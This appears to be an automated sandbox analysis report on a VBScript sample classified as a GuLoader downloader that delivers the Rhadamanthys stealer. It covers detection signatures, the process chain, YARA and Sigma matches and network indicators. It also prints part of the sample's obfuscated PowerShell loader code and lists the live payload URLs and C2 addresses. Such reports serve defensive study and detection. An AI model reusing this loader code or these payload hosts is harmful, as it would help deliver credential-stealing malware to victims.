Windows Analysis Report
0iTxQouy7k.vbs

Overview

General Information

Sample name: 0iTxQouy7k.vbs (renamed because original name is a hash value)
Original sample name: 9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a.vbs
Analysis ID: 1578226
MD5: 3641d1c1daf325ca23298e285dc44693
SHA1: ac8cd1a18de887698bdd2301fccfcff0202bbcb0
SHA256: 9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a
Tags: 185-236-228-92, 87-120-112-91, GuLoader, vbs, www-al-rasikh-com, user-JAMESWT_MHT

Detection

GuLoader, RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7140 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 5812 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [long obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4948 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [long obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5948 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 6204 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies, it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author):
0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
00000008.00000002.2135088634.0000000008CA0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security
0000000B.00000003.2199773661.0000000005A50000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Yara matches in unpacked PEs (Source | Rule | Description | Author):
10.3.msiexec.exe.21870000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
11.3.svchost.exe.5830000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
10.3.msiexec.exe.21650000.6.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
11.3.svchost.exe.5a50000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
10.3.msiexec.exe.21650000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Yara matches in AMSI scan buffers (Source | Rule | Description | Author):
amsi64_5752.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_4948.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Matched strings for INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (offset:identifier: content):
  • 0xbd7a:$b2: ::FromBase64String(
  • 0xae12:$s1: -join
  • 0x45be:$s4: +=
  • 0x4680:$s4: +=
  • 0x88a7:$s4: +=
  • 0xa9c4:$s4: +=
  • 0xacae:$s4: +=
  • 0xadf4:$s4: +=
  • 0x140ab:$s4: +=
  • 0x1412b:$s4: +=
  • 0x141f1:$s4: +=
  • 0x14271:$s4: +=
  • 0x14447:$s4: +=
  • 0x144cb:$s4: +=
  • 0xb622:$e4: Get-WmiObject
  • 0xb811:$e4: Get-Process
  • 0xb869:$e4: Start-Process
  • 0x14d1c:$e4: Get-Process

                        System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", ProcessId: 7140, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5948, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5948, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6204, ProcessName: svchost.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", ProcessId: 7140, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [long obfuscated PowerShell command line omitted]
Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-12-19T12:48:02.247816+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 202.71.109.228 | 443 | TCP

                        AV Detection

Source: 0iTxQouy7k.vbs Virustotal: Detection: 16%
Source: 0iTxQouy7k.vbs ReversingLabs: Detection: 28%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.6% probability
Source: unknown HTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Binary string: wkernel32.pdb source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2132386041.0000000008750000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp

                        Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 45.149.241.141 2023
Source: global traffic TCP traffic: 192.168.2.4:49739 -> 45.149.241.141:2023
Source: Joe Sandbox View IP Address: 45.149.241.141
Source: Joe Sandbox View IP Address: 202.71.109.228
Source: Joe Sandbox View ASN Name: UUNETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49738 -> 202.71.109.228:443
Source: global traffic HTTP traffic detected: GET /kp/Epilachna.qxd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.tdejb.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ab/ab.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.tdejb.com | Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 45.149.241.141
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 11_2_05B6B055 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject,11_2_05B6B055
Source: global traffic DNS traffic detected: DNS query: www.tdejb.com
Source: msiexec.exe, 0000000A.00000003.2178558767.0000000000667000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178501643.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2203558932.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178435166.000000000062E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000000.00000002.1774255669.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773528398.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1772993678.000001CE97ECF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.1774255669.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773528398.000001CE97EDC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1772993678.000001CE97ECF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1741652492.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741505742.000001CE97F29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0c3741d782f58
Source: wscript.exe, 00000000.00000003.1741652492.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741505742.000001CE97F29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0c3741d782
Source: powershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tdejb.com
                        Source: powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tdejb.com
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: svchost.exeString found in binary or memory: https://cloudflare-dns.com/dns-query
                        Source: powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E67B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E6848A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/km/Epilachna.qxd
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E68B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bin
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bin.Tg
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bineT
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bini
                        Source: powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E6848A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/kp/Epilachna.qxd
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_24215ad2-3
                        Source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_53184757-2
                        Source: Yara matchFile source: 10.3.msiexec.exe.21870000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.5830000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21650000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.5a50000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21650000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21870000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.3.msiexec.exe.21650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.svchost.exe.5a50000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2199773661.0000000005A50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2199606583.0000000005830000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5948, type: MEMORYSTR

                        System Summary

                        barindex
                        Source: amsi32_4948.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. 
BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B9EAB26
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B9EB8D2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAB87A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BABA4DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BAB9CCA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_04D6E928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_04D6F1F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_04D6E5E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B7D5A9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B694D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B7FC02
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B7CF7E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B78660
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B7318B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B789ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B691CA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B8104C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B7DB45
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 11_2_05B7D229
Source: 0iTxQouy7k.vbs | Initial sample: strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4468
Source: unknown | Process created: Commandline size = 4468
Source: amsi32_4948.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@13/9@1/2
